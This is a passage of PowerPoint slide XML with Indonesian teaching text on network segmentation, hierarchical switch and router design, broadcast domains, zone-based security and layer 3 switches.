              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> firewall host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pandangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> host di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>semuanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bebas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hirarkis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hirarki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilayani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bintang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilayani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh router. Router-router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain broadcast yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>istilah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> 3". Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> inti. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perutean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengalihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> workstation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
